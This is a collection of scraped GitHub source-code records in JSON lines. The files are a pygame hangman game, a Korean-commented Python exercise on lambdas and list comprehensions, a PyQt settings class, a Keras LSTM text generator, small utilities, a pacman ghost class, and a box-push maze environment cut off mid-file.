\"\n\n text = letter_font.render(display_word, True, BLACK)\n screen.blit(text, (400, 200))\n\n\npygame.init()\nWIDTH, HEIGHT = 800, 500\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"hangman\")\ngame_over = False\n\n\n# Images\n\nIMAGES = []\nhangman_satus = 0\n\nfor i in range(7):\n image = pygame.image.load(f\"images/hangman{i}.png\")\n IMAGES.append(image)\n\n# Buttons\nROWS = 2\nCOLS = 13\nGAP = 20\nSIZE = 40\nBOXES = []\n\nfor row in range(ROWS):\n for col in range(COLS):\n x = ((GAP * col) + GAP) + (SIZE * col)\n y = ((GAP * row) + GAP) + (SIZE * row) + 330\n box = pygame.Rect(x,y,SIZE,SIZE)\n BOXES.append(box)\n\nA = 65\nBUTTONS = []\n\nfor ind, box in enumerate(BOXES):\n letter = chr(A+ind)\n button = ([box, letter])\n BUTTONS.append(button)\n\n# Fonts\nbtn_font = pygame.font.SysFont('arial', 30)\nletter_font = pygame.font.SysFont(\"comicsansms\", 60)\ngame_font = pygame.font.SysFont(\"comicsansms\", 40)\n\n\n# Word\nword_liab = ['FISHING',\t'WOMAN',\t'BUYER',\t'MANAGER',\t'AD',\t'YEAR',\t'STUDENT',\t'POET'\n,\t'ABILITY',\t'FAMILY',\t'PLAYER',\t'BREATH',\t'COLLEGE',\t'MEAT',\t'STEAK',\t'SPEECH',\t'STORY'\n,\t'CHARITY',\t'COOKIE',\t'POLICY',\t'CELL',\t'THING',\t'GIRL',\t'SKILL',\t'POWER',\t'REALITY'\n,\t'BEDROOM',\t'LADDER',\t'FUNERAL',\t'SCIENCE',\t'ARRIVAL',\t'WRITER',\t'CHEST',\t'SURGERY'\n,\t'ARMY',\t'ORANGE',\t'POETRY',\t'COFFEE',\t'PIE',\t'TRAINER',\t'QUALITY',\t'FOOD',\t'ENERGY'\n,\t'ESTATE',\t'WARNING',\t'EVENT',\t'VERSION',\t'ART',\t'GATE',\t'RATIO']\n\nWORD = random.choice(word_liab)\nGUESSED = []\n\n# Title\ntitle = \"Hangman Game\"\ntitle_text = game_font.render(title, True, BLACK)\ntitle_text_rect = title_text.get_rect(center=(WIDTH//2,title_text.get_height()//2+10))\n\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == MOUSEBUTTONDOWN:\n clicked_pos = event.pos\n\n for button, letter in BUTTONS:\n if button.collidepoint(clicked_pos):\n GUESSED.append(letter)\n\n if letter not in WORD:\n hangman_satus += 1\n\n if hangman_satus == 6:\n game_over = True\n\n BUTTONS.remove([button, letter])\n\n screen.fill(WHITE)\n screen.blit(IMAGES[hangman_satus], (150,100))\n screen.blit(title_text, title_text_rect)\n draw_btns(BUTTONS)\n display_guess()\n\n won = True\n\n for letter in WORD:\n if letter not in GUESSED:\n won = False\n\n Emoji=[]\n if won:\n game_over = True\n display_text = 'You Won !!!'\n image = pygame.image.load(f\"images/hangman{8}.jpg\")\n Emoji.append(image)\n\n else:\n display_text = f\"\"\"You Lost !!!\\n Word was {WORD}\"\"\"\n image = pygame.image.load(f\"images/hangman{7}.jpg\")\n Emoji.append(image)\n\n pygame.display.update()\n\n if game_over:\n screen.fill(WHITE)\n game_over_text = game_font.render(display_text, True, BLACK)\n game_over_text_rect = game_over_text.get_rect(center=(WIDTH//2,HEIGHT//3))\n screen.blit(game_over_text, game_over_text_rect)\n screen.blit(Emoji[0], (120, 200))\n pygame.display.update()\n pygame.time.delay(4000)\n pygame.quit()\n sys.exit()\n\n\n","repo_name":"Shalvi-Singhal/hangman-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2514150472","text":"\n# coding: utf-8\n\n# In[2]:\n\n########## Lambda = LD / List Comprehension = LC\n# 1. 조건문 범위 지정\nres=[];\n\nfor i in range(10):\n # ()가 없을경우, 인터프리터는 실행범위를 내부적으로 fix하게 됨\n # \"fast\" if (i+1)%3==0 else \"\" + \"campus\"\n # 그렇기 때문에 3의 배수가 아니면 \"\"+\"campus\"가 출력되는 것임\n # 때문에, 조건을 ()를 통해 block 지정을 해 주는 것이 중요함\n # 따로 조건을 계산해 주기 위해서 ()를 해주게 됨\n element=(\"fast\" if (i+1)%3==0 else \"\") + (\"camp\" if (i+1)%5==0 else \"\")\n res.append(element)\n \nres\n\n\n# In[13]:\n\n# 2. 소수 구하기\ndef isPrime(number):\n for i in range(2, number):\n if number%i==0:\n return False\n return True\n\n# assert는 미리 함수를 테스트해 볼 수 있는 함수\nassert isPrime(2) == True\n\n\n# In[17]:\n\ndef get_prime(n):\n arr=[]\n for i in range(2, n):\n if isPrime(i):\n arr.append(i)\n return arr\n\nget_prime(10)\n\n\n# In[21]:\n\n# 3. tuple로 parameter 받기\n# 1의 함수를 수정\n# tuple을 []로 묶어서 받을 수 있음\n\ndef tuple_parameter(n, rule1, rule2):\n arr=[];\n for i in range(n):\n text=\"\"\n for rule in [rule1, rule2] :\n #div, val = rule\n text+=rule[1] if (i+1)%rule[0]==0 else \"\"\n arr.append(text)\n return arr\n\ntuple_parameter(10, (3, \"fast\"), (5, \"campus\"))\n\n\n# In[26]:\n\n# 4. List의 모든 합과 max값 구하기\n\ndef get_sum(arr):\n res=0;\n for i in arr:\n res+=i\n return res\n\nget_sum([1,2,3,4])\n\ndef get_max(arr):\n res=arr[0]\n for i in arr:\n if i > res:\n res = i\n return res\n\nget_max([-1,-2,-3,-4,-1])\n\n\n# # 1. Lambda Operator / List Comprehension\n\n# ## 1. map\n\n# In[30]:\n\n# 5. Lambda Operator\n# 5-1. map\n\n# List를 입력받아 모두 2를 곱해주는 map\n\nlist(map(lambda x: x * 2, [1,2,3,4]))\n\n# 3의 결과를 횟수를 입력받아 Lambda Operator로 표현\nlist(map(lambda x: (\"fast\" if (x+1)%3==0 else \"\") + (\"camp\" if (x+1)%5==0 else \"\")\n , range(10)))\n\n\n# In[32]:\n\n# List Comprehension\n[\n (\"fast\" if (x+1)%3==0 else \"\") + \\\n (\"camp\" if (x+1)%5==0 else \"\")\n for x\n in range(10)\n]\n\n\n# ## 2. filter\n\n# In[41]:\n\n# List를 입력받아 양수만 반환\n\ndata=[1,-2,3,-5]\n# 함수\ndef get_pos(arr):\n res=[];\n for i in arr:\n if i > 0:\n res.append(i)\n return res\n\nget_pos(data)\n\n# Lambda\nlist(filter(lambda x: x > 0, data))\n\n# List Comprehension\n[\n i\n for i in data\n if i>0\n]\n\n\n# In[20]:\n\n# sum_fifth\n# 1~10의 배열을 입력받아 제곱한 후, 그 값이 50이 넘는 값만 출력\ndef sum_fifth():\n arr=[]\n for i in range(1, 11):\n if i**2 > 50:\n arr.append(i**2);\n return arr\n\nsum_fifth()\n\n# Lambda\ndef sum_fifth_lambda():\n return list(filter(lambda x: x>50, map(lambda x: x**2, range(11))))\n\nsum_fifth_lambda()\n\n# List Comprehension\ndef sum_fifth_list():\n return [\n i**2\n for i\n in range(11)\n if i**2>50\n ]\n\nsum_fifth_list()\n\n\n# ## reduce\n\n# In[12]:\n\n# get_sum\n# list의 값을 모두 더해 return\nfrom functools import reduce\n\n\ndef get_sum(arr):\n res=0\n for i in arr:\n res+=i\n return res\n\nreduce(lambda x, y: x+y, range(5))\n\n\n# In[21]:\n\n# get_max\n# list의 최대값을 return\n\ndef get_max(arr):\n res=arr[0]\n for i in arr:\n if i > res:\n res = i;\n return res\n\nreduce(lambda x, y: x if (x>y) else y, [1,2,3,-4])\n\n\n# In[58]:\n\n# get_avg\n# [{}] 형태의 list를 입력받아 각각의 평균을 계산\n\ndata=[\n {\"rent\" : 50,\n \"deposit\" : 1000\n },\n {\"rent\" : 55,\n \"deposit\" : 2000\n },\n {\"rent\" : 60,\n \"deposit\" : 6000\n },\n]\n\n\n# In[53]:\n\ndef get_avg(data):\n res={}\n rent_sum=0\n dep_sum=0\n \n for i in data:\n rent_sum+=i[\"rent\"]\n dep_sum+=i[\"deposit\"]\n res[\"rent\"]=rent_sum/3\n res[\"deposit\"]=dep_sum/3\n \n return res\n\nget_avg(data)\n\n\n# In[54]:\n\n#reduce(lambda x, y: x[\"rent\"]+y[\"rent\"], data)\n\n# 위 연산은 {\"rent\" : 50, \"deposit\" : 1000} + {\"rent\" : 55, \"deposit\": 2000}의 연산\n# 즉 dic인 x와 y가 통째로 들어와 연산됨.\n# 두 번째 연산은 첫 번째 연산의 결과로 만들어진 dic이 적용됨\n# 즉 {\"rent\":105} + {\"rent\":60, \"deposit\":6000}\n# x[\"rent\"]=105 + y[\"rent\"]=60 이 연산됨\n# 그렇기 때문에 x[\"rent\"] + y[\"rent\"]는 \n# {\"rent\" : 50, \"deposit\" : 1000} + {\"rent\" : 55, \"deposit\": 2000}이 계산되어\n# 두 번째 연산 시 x=105, 즉 105[\"rent\"]를 찾는 꼴이 되어 연산에 실패한다\n\nres=reduce(lambda x, y: {\"rent\" : x[\"rent\"]+y[\"rent\"],\n \"deposit\" : x[\"deposit\"]+y[\"deposit\"]}\n , data)\n\n\n# In[55]:\n\nfor i in res:\n res[i]=res[i]/3\nres\n\n\n# In[62]:\n\nrent_avg=(reduce(lambda x, y: x + y, [\n i[\"rent\"]\n for i \n in data\n ]))/3\n\nrent_avg\n\n\n# # 2. \\*args, \\**kwagrs\n\n# In[70]:\n\n# packing과 unpacking의 개념\n\ndef test(*args, **kwargs): # *args는 tuple로 가변 parameter를 packing\n print(args) # **kwargs는 dic으로 가변 parameter를 packing\n print(kwargs) \n \n\n\n# In[95]:\n\ndata=[1,2,3,4]\n#test((\"test\", \"tes1\"), (\"Test2\", \"test3\"), ok=\"ok\")\ntest(data)\ntest(*data) #unpacking\n\n\n# In[98]:\n\n# dic의 경우 unpack이 필요 없는 구조인듯?\ntest2((\"test\", \"test1\"), (\"test2\", \"test3\"),test=\"ok\", name=\"power\")\n\n\n# ## 3. 응용\n\n# In[112]:\n\ndef get_args_list(n, *args):\n arr=[];\n \n for i in range(n):\n text=\"\"\n for ind, val in args:\n \n text+=val if (i+1)%ind==0 else \"\"\n arr.append(text);\n \n return arr\n\n\n# In[113]:\n\nget_args_list(10, (3, \"fast\"), (5, \"test\"), (7, \"ok\"))\n\n\n# In[116]:\n\ndef get_args_lambda(n, *args):\n return list(map(\n lambda x: \"\".join(\n map(lambda y: y[1] if (x+1)%y[0]==0 else \"\"\n ,args)\n )\n , range(n)))\n\n\n# In[118]:\n\nget_args_lambda(10, (3, \"fast\"), (5, \"test\"), (7, \"ok\"))\n\n\n# In[119]:\n\ndef get_args_test(n, *args):\n return [\n \"\".join([\n val if (i+1)%ind==0 else \"\"\n for ind, val in args \n ])\n for i in range(n)\n ]\n\n\n# In[120]:\n\nget_args_test(10, (3, \"fast\"), (5, \"test\"), (7, \"ok\"))\n\n","repo_name":"stardustrain/w_keuntaek_han","sub_path":"Class/week2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1651026313","text":"from PyQt5.QtCore import QSettings\nimport os\n\n\nclass Settings:\n \"\"\"\n Holds the settings for sarge\n \"\"\"\n\n def __init__(self):\n self.organisation = \"Bitcast\"\n self.application = \"sarge\"\n self.config = QSettings(self.organisation, self.application)\n changed = False\n if not self.config.contains(\"columns\"):\n changed = True\n self.config.setValue(\"columns\", 2)\n\n if not self.config.contains(\"files\"):\n changed = True\n self.config.setValue(\n \"files\",\n [\n \"~/music/jingles/Station ID III (2017).mp3\",\n \"~/music/jingles/This is UCT Radio (Voice Only).mp3\",\n \"~/music/jingles/Transition Effect.mp3\",\n \"~/music/jingles/Turn It Up ( The Soundtrack to Your Campus life).mp3\",\n ],\n )\n\n if not self.config.contains(\"music_directory\"):\n changed = True\n self.config.setValue(\"music_directory\", \"~/music/library\")\n\n if not self.config.contains(\"sample_rate\"):\n changed = True\n self.config.setValue(\"sample_rate\", 48000)\n\n if not self.config.contains(\"channels\"):\n changed = True\n self.config.setValue(\"channels\", \"Mono\")\n\n if changed:\n del self.config\n self.config = QSettings(self.organisation, self.application)\n\n @property\n def sarge_columns(self):\n \"\"\"returns number of columns\"\"\"\n return self.config.value(\"columns\", type=int)\n\n @sarge_columns.setter\n def sarge_columns(self, columns):\n self.config.setValue(\"columns\", columns)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n\n @property\n def music_directory(self):\n \"\"\"Returns the directory of the voice\"\"\"\n directory = self.config.value(\"music_directory\", type=str)\n if directory.startswith(\"~\"):\n return os.path.expanduser(directory)\n return directory\n\n @music_directory.setter\n def music_directory(self, directory):\n self.config.setValue(\"music_directory\", directory)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n\n @property\n def sarge_files(self):\n all_files = self.config.value(\"files\")\n return all_files\n\n @sarge_files.setter\n def sarge_files(self, files):\n self.config.setValue(\"files\", files)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n\n @property\n def sarge_player_channel(self):\n \"\"\"Returns details on the play of the songs\"\"\"\n channels = self.config.value(\"channels\", type=int)\n return channels\n\n @sarge_player_channel.setter\n def sarge_player_channel(self, channel):\n self.config.setValue(\"channels\", channel)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n\n @property\n def sarge_player_sample_rate(self):\n \"\"\"Returns details on the play of the songs\"\"\"\n sample_rate = self.config.value(\"sample_rate\", type=int)\n return sample_rate\n\n @sarge_player_sample_rate.setter\n def sarge_player_sample_rate(self, sample_rate):\n self.config.setValue(\"sample_rate\", sample_rate)\n del self.config\n self.config = QSettings(self.organisation, self.application)\n","repo_name":"bitcastza/sarge","sub_path":"sarge/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32394611298","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM, TimeDistributed, Activation\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, Callback\nimport os\n\n#preparing\nfilename = 'data.txt'\nSTART_CHAR = '\\b'\nEND_CHAR = '\\t'\nPADDING_CHAR = '\\a'\nchars = set([START_CHAR, '\\n', END_CHAR])\nwith open(filename, 'r', encoding = 'cp1251') as f:\n for line in f:\n chars.update( list(line.strip().lower()) )\nchar_indeces = {c: i for i,c in enumerate(sorted(list(chars))) }\nchar_indeces[PADDING_CHAR] = 0\nindices_to_chars = {i: c for c,i in char_indeces.items()}\nnum_chars = len(chars)\n# ohe-encoding for symbols\ndef get_one(i, sz):\n res = np.zeros(sz)\n res[i] = 1\n return res\n\nchar_vectors = {\n c: (np.zeros(num_chars) if c == PADDING_CHAR else get_one(v, num_chars))\n for c,v in char_indeces.items()\n }\n# parse sentences\nsentences_end_markers = set('?.!')\nsentences = []\ncurrent_sentence = ''\nwith open(filename, 'r', encoding = 'cp1251') as f:\n for line in f:\n s = line.strip().lower()\n if len(s) > 0:\n current_sentence += s + '\\n'\n if len(s) == 0 or s[-1] in sentences_end_markers:\n current_sentence = current_sentence.strip()\n if len(current_sentence) > 10:\n sentences.append(current_sentence)\n current_sentence = ''\n# make X and y vectors\ndef get_matrices(sentences):\n max_sentence_length =np.max([len(x) for x in sentences])\n X = np.zeros((len(sentences), max_sentence_length, len(chars)), dtype=np.bool)\n y = np.zeros((len(sentences), max_sentence_length, len(chars)), dtype=np.bool)\n for i, sentence in enumerate(sentences):\n char_seq = (START_CHAR + sentence + END_CHAR).ljust(max_sentence_length + 1, PADDING_CHAR)\n for t in range(max_sentence_length):\n X[i,t,:] = char_vectors[char_seq[t]]\n y[i,t,:] = char_vectors[char_seq [t + 1]]\n return X, y \n# making model\nmodel = Sequential()\nmodel.add(LSTM(output_dim = 128, activation='tanh', return_sequences = True, input_dim = num_chars))\nmodel.add(Dropout(0.2))\nmodel.add(TimeDistributed(Dense(output_dim = num_chars)))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy',optimizer = Adam(clipnorm = 1.),metrics=['accuracy'])\n\ntest_indices = np.random.choice(range(len(sentences)), int(len(sentences)*0.05))\nsentences_train = [sentences[x] for x in set(range(len(sentences))) - set(test_indices)]\nsentences_test = [sentences[x] for x in test_indices]\nsentences_train = sorted(sentences_train, key = lambda x:len(x))\nX_test, y_test = get_matrices(sentences_test)\nbatch_size = 16\n\ndef generate_batch():\n while True:\n for i in range( int(len(sentences_train) / batch_size) ):\n sentences_batch = sentences_train[ i*batch_size: (i+1)*batch_size]\n yield get_matrices(sentences_batch)\n\noutput_fname = 'idk.txt'\n\nclass CharSampler(Callback):\n def __init__(self, char_vectors, model):\n self.char_vectors = char_vectors\n self.model = model\n\n def on_train_begin(self,logs = {}):\n self.epoch = 0\n if os.path.isfile(output_fname):\n os.remove(output_fname)\n \n def sample(self, preds, temperature = 1.0):\n preds = np.asarray(preds).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n probas = np.random.multinomial(1, preds, 1)\n return np.argmax(probas)\n\n def sample_one(self, T):\n result = START_CHAR\n while len(result) < 500:\n Xsamples = np.zeros((1, len(result), num_chars))\n for t,c in enumerate(list(result)):\n Xsamples[0,t,:] = self.char_vectors[c]\n ysampled = self.model.predict(Xsamples, batch_size = 1)[0,:]\n yv = ysampled[len(result) - 1, :]\n selected_char = indices_to_chars[self.sample(yv, T)]\n if selected_char == END_CHAR:\n break\n result += selected_char\n return selected_char\n\n def on_epoch_end(self, batch, logs = {}):\n self.epoch += 1\n if self.epoch % 1 == 0:\n print(\"\\n Epoch %d text sampling:\" % self.epoch)\n with open(output_fname, 'a') as f:\n f.write(\"\\n === Epoch %d ===\" % self.epoch)\n for T in [0.3, 0.5, 0.7, 0.9, 1.1]:\n print(\"\\tsampling, T = %.1f\" % T)\n for _ in range(5):\n self.model.reset_states()\n res = self.sample_one(T)\n f.write('\\nT = %.1f\\n%s\\n' % (T, res[1:]))\n\n\ncb_logger = CSVLogger('sin_l/' + filename + '.log')\ncb_sampler = CharSampler(char_vectors, model)\n\nmodel.fit_generator(generate_batch(),int(len(sentences_train)/batch_size) *batch_size,epochs = 10, verbose = True,validation_data = (X_test, y_test),callbacks = [cb_sampler, cb_sampler])\n","repo_name":"sergey-byk0v/Examples_from_book","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41115879127","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 11 17:17:07 2021\r\n\r\n@author: yan-s\r\n\"\"\"\r\n\r\ndef yes_no(answer):\r\n yes = set(['yes','y', 'ye', ''])\r\n no = set(['no','n'])\r\n \r\n while True:\r\n choice = input(answer).lower()\r\n if choice in yes:\r\n return True\r\n elif choice in no:\r\n return False\r\n else:\r\n print(\"Please respond with 'yes' or 'no'\\n\")","repo_name":"Toppics/Misc","sub_path":"yes_no.py","file_name":"yes_no.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28643339043","text":"import functools\nimport gzip\nimport itertools\nimport operator\nimport os\nimport weakref\nfrom typing import Dict\n\nimport pyro\nimport torch\nimport tqdm\nfrom torch.distributions import constraints, transform_to\n\n\ndef pearson_correlation(x: torch.Tensor, y: torch.Tensor):\n x = (x - x.mean()) / x.std()\n y = (y - x.mean()) / y.std()\n return (x * y).mean()\n\n\ndef pyro_param(name, shape, constraint=constraints.real):\n transform = transform_to(constraint)\n terms = []\n for subshape in itertools.product(*({1, int(size)} for size in shape)):\n subname = \"_\".join([name] + list(map(str, subshape)))\n subinit = functools.partial(torch.zeros, subshape)\n terms.append(pyro.param(subname, subinit))\n unconstrained = functools.reduce(operator.add, terms)\n return transform(unconstrained)\n\n\ndef quotient_central_moments(\n fine_values: torch.Tensor, fine_to_coarse: torch.Tensor\n) -> torch.Tensor:\n \"\"\"\n Returns (zeroth, first, second) central momemnts of each coarse cluster of\n fine values, i.e. (count, mean, stddev).\n\n :returns: A single stacked tensor of shape ``(3,) + fine_values.shape``.\n \"\"\"\n C = 1 + int(fine_to_coarse.max())\n moments = torch.zeros(3, C)\n moments[0].scatter_add_(0, fine_to_coarse, torch.ones_like(fine_values))\n moments[1].scatter_add_(0, fine_to_coarse, fine_values)\n moments[1] /= moments[0]\n fine_diff2 = (fine_values - moments[1][fine_to_coarse]).square()\n moments[2].scatter_add_(0, fine_to_coarse, fine_diff2)\n moments[2] /= moments[0]\n moments[2].sqrt_()\n return moments\n\n\ndef weak_memoize_by_id(fn):\n cache = {}\n missing = object() # An arbitrary value that cannot be returned by fn.\n\n @functools.wraps(fn)\n def memoized_fn(*args):\n key = tuple(map(id, args))\n result = cache.get(key, missing)\n if result is missing:\n result = cache[key] = fn(*args)\n for arg in args:\n # Register callbacks only for types that support weakref.\n if type(arg).__weakrefoffset__:\n weakref.finalize(arg, cache.pop, key, None)\n return result\n\n return memoized_fn\n\n\n_TENSORS: Dict[tuple, torch.Tensor] = {}\n\n\ndef deduplicate_tensor(x):\n key = x.dtype, x.stride(), x.data_ptr()\n return _TENSORS.setdefault(key, x)\n\n\ndef torch_map(x, **kwargs):\n \"\"\"\n Calls ``leaf.to(**kwargs)`` on all tensor and module leaves of a nested\n data structure.\n \"\"\"\n return _torch_map(x, **kwargs)[0]\n\n\n@functools.singledispatch\ndef _torch_map(x, **kwargs):\n return x, False\n\n\n@_torch_map.register(torch.Tensor)\ndef _torch_map_tensor(x, **kwargs):\n x_ = x.to(**kwargs)\n changed = x_ is not x\n return x_, changed\n\n\n@_torch_map.register(torch.nn.Module)\ndef _torch_map_module(x, **kwargs):\n changed = True # safe\n return x.to(**kwargs), changed\n\n\n@_torch_map.register(dict)\ndef _torch_map_dict(x, **kwargs):\n result = type(x)()\n changed = False\n for k, v in x.items():\n v, v_changed = _torch_map(v, **kwargs)\n result[k] = v\n changed = changed or v_changed\n return (result, True) if changed else (x, False)\n\n\n@_torch_map.register(list)\n@_torch_map.register(tuple)\ndef _torch_map_iterable(x, **kwargs):\n result = []\n changed = False\n for v in x:\n v, v_changed = _torch_map(v, **kwargs)\n result.append(v)\n changed = changed or v_changed\n result = type(x)(result)\n return (result, True) if changed else (x, False)\n\n\ndef pretty_print(x, *, name=\"\", max_items=10):\n if isinstance(x, (int, float, str, bool)):\n print(f\"{name} = {repr(x)}\")\n elif isinstance(x, torch.Tensor):\n print(f\"{name}: {type(x).__name__} of shape {tuple(x.shape)}\")\n elif isinstance(x, (tuple, list)):\n print(f\"{name}: {type(x).__name__} of length {len(x)}\")\n elif isinstance(x, dict):\n print(f\"{name}: {type(x).__name__} of length {len(x)}\")\n if len(x) <= max_items:\n for k, v in x.items():\n pretty_print(v, name=f\"{name}[{repr(k)}]\", max_items=max_items)\n else:\n print(f\"{name}: {type(x).__name__}\")\n\n\ndef generate_colors(num_points=100, lb=0.5, ub=2.5):\n \"\"\"\n Constructs a quasirandom collection of colors for plotting.\n \"\"\"\n # http://extremelearning.com.au/unreasonable-effectiveness-of-quasirandom-sequences/\n phi3 = 1.2207440846\n alpha = torch.tensor([1 / phi3**3, 1 / phi3**2, 1 / phi3])\n t = torch.arange(float(2 * num_points))\n rgb = alpha.mul(t[:, None]).add(torch.tensor([0.8, 0.2, 0.1])).fmod(1)\n total = rgb.sum(-1)\n rgb = rgb[(lb <= total) & (total <= ub)]\n rgb = rgb[:num_points]\n assert len(rgb) == num_points\n return [f\"#{r:02x}{g:02x}{b:02x}\" for r, g, b in rgb.mul(256).long().tolist()]\n\n\ndef open_tqdm(*args, **kwargs):\n with open(*args, **kwargs) as f:\n with tqdm.tqdm(\n total=os.stat(f.fileno()).st_size,\n unit=\"B\",\n unit_scale=True,\n unit_divisor=1024,\n smoothing=0,\n ) as pbar:\n for line in f:\n pbar.update(len(line))\n yield line\n\n\ndef gzip_open_tqdm(filename, mode=\"rb\"):\n with open(filename, \"rb\") as f, gzip.open(f, mode) as g:\n with tqdm.tqdm(\n total=os.stat(f.fileno()).st_size,\n unit=\"B\",\n unit_scale=True,\n unit_divisor=1024,\n smoothing=0,\n ) as pbar:\n for line in g:\n pbar.n = f.tell()\n pbar.update(0)\n yield line\n","repo_name":"broadinstitute/pyro-cov","sub_path":"pyrocov/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"47"} +{"seq_id":"858799877","text":"#!/usr/bin/python3\n\n\nfrom jk_simplexml import *\n\n\nxRoot = HElement(\"ROOT\")\nxRoot.setAttributeValue(\"foo\", \"bar\")\nxRoot.setChildText(\"Foo bar\")\nx = HElement(\"SomeElement\")\nx.setAttributeValue(\"x\", \"y\")\nx.setAttributeValue(\"y\", \"123\")\nxRoot.children.append(x)\nxRoot.children.append(HText(\"We < are > going & walking\"))\n\n\nwith open(\"test2.html\", \"w\") as f:\n\tf.write(HSerializer.toHTMLDocStr(xRoot))\n\n\n\n","repo_name":"jkpubsrc/python-module-jk-simplexml","sub_path":"examples/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39790876666","text":"import pygame\nimport random\nimport global_variables as gv\n'''I was unable to design a code which follows the pacman so I made every ghost random'''\n\n\nclass Ghost:\n def __init__(self, ghost_type, starting_position):\n self.image = pygame.image.load(gv.GHOST_SOURCE_IMAGES[ghost_type][0]) # load all images\n self.rect = self.image.get_rect() # draw a rectangle around the ghosts\n self.movement_direction = [0, 0]\n self.movement_speed = 4\n self.position = starting_position # starting position is defined in the main file\n\n # let them move randomly\n def set_random_direction(self):\n # change direction every 90 ticks on average\n tick_interval = 30\n change_direction = random.randint(0, tick_interval + 1)\n if change_direction == tick_interval:\n gv.ran_x = random.randint(-1, 1) # random x-direction\n gv.ran_y = 0\n if gv.ran_x == 0:\n y_directions = [-1, 1] # random y-direction\n gv.ran_y = y_directions[random.randint(0, 1)]\n self.movement_direction = [gv.ran_x, gv.ran_y]\n\n # sets the active pixel which is checked in the for-loop in the right direction\n def next_move_is_possible(self):\n offset = [] # the offset describes the shift of the pixel depending on the direction\n ap_direction = []\n if self.movement_direction == gv.directions[0]: # up\n offset = [0, self.movement_speed * (-1)]\n ap_direction = gv.directions[3]\n elif self.movement_direction == gv.directions[1]: # down\n offset = [0, 25 + self.movement_speed]\n ap_direction = gv.directions[3]\n elif self.movement_direction == gv.directions[2]: # left\n offset = [self.movement_speed * (-1), 0]\n ap_direction = gv.directions[1]\n elif self.movement_direction == gv.directions[3]: # right\n offset = [25 + self.movement_speed, 0]\n ap_direction = gv.directions[1]\n elif self.movement_direction == gv.directions[4]: # stationary\n return True\n\n for i in range(25): # the active pixel evolves to a whole string\n x = self.position[0] + offset[0] + ap_direction[0] * i\n y = self.position[1] + offset[1] + ap_direction[1] * i\n if gv.screen.get_at([x, y]) == (0, 18, 255, 255): # check if the next step involves a blue pixel\n return False\n\n return True\n\n # if they randomly walk into the portal, they are teleported as well\n def teleport(self):\n if self.position[0] < 18:\n self.position[0] = 965\n elif self.position[0] > 965:\n self.position[0] = 25\n\n # updating position\n def move(self):\n self.set_random_direction() # load the direction and the teleport function\n self.teleport()\n possible_directions = gv.directions.copy()\n del possible_directions[4]\n if self.movement_direction != gv.directions[4]: # deletes the [0,0] direction and the old direction\n del possible_directions[possible_directions.index(self.movement_direction)]\n if not self.next_move_is_possible(): # if the ghost is stuck it changes the direction right away\n self.movement_direction = possible_directions[random.randint(0, 2)]\n x = self.position[0] + (self.movement_speed * self.movement_direction[0])\n y = self.position[1] + (self.movement_speed * self.movement_direction[1])\n self.position = [x, y]\n\n # draw the ghosts onto the surface\n def blit_ghost(self, surface):\n self.rect = self.image.get_rect()\n self.rect.x = self.position[0]\n self.rect.y = self.position[1]\n surface.blit(self.image, self.rect)","repo_name":"Daniel031000/pacman-unchained2","sub_path":"ghost.py","file_name":"ghost.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16914753365","text":"import numpy as np\nfrom math import pi\nfrom gym_boxpush.envs.boxpush import *\n\nclass BoxPushMaze(BoxPush):\n\n def reset_state(self):\n self.force_applied = np.asarray([0.0, 0.0])\n\n self.boxes = []\n self.teleporter_pairs = []\n\n self.player = Box(\n x=85,\n y=15,\n width=20,\n height=20,\n mass=100,\n color=(0, 1, 0),\n friction=0.1,\n is_controlled=True,\n bounciness=0\n )\n\n self.player.vel = self.player.vel + [0, 0]\n\n self.boxes.append(self.player)\n\n # Add walls\n self.boxes.append(Box(\n x=0,\n y=50,\n width=10,\n height=100,\n movable=False,\n friction=0.01,\n ))\n self.boxes.append(Box(\n x=100,\n y=50,\n width=10,\n height=100,\n movable=False,\n friction=0.01,\n ))\n self.boxes.append(Box(\n x=50,\n y=0,\n width=100,\n height=10,\n movable=False,\n friction=0.01,\n ))\n self.boxes.append(Box(\n x=50,\n y=100,\n width=100,\n height=10,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=37.5,\n y=50,\n width=20,\n height=50,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=5,\n y=62.5,\n width=4,\n height=75,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=60,\n y=65,\n width=27.5,\n height=20,\n movable=False,\n friction=0.01,\n ))\n\n self.boxes.append(Box(\n x=62.5,\n y=30,\n width=68,\n height=10,\n 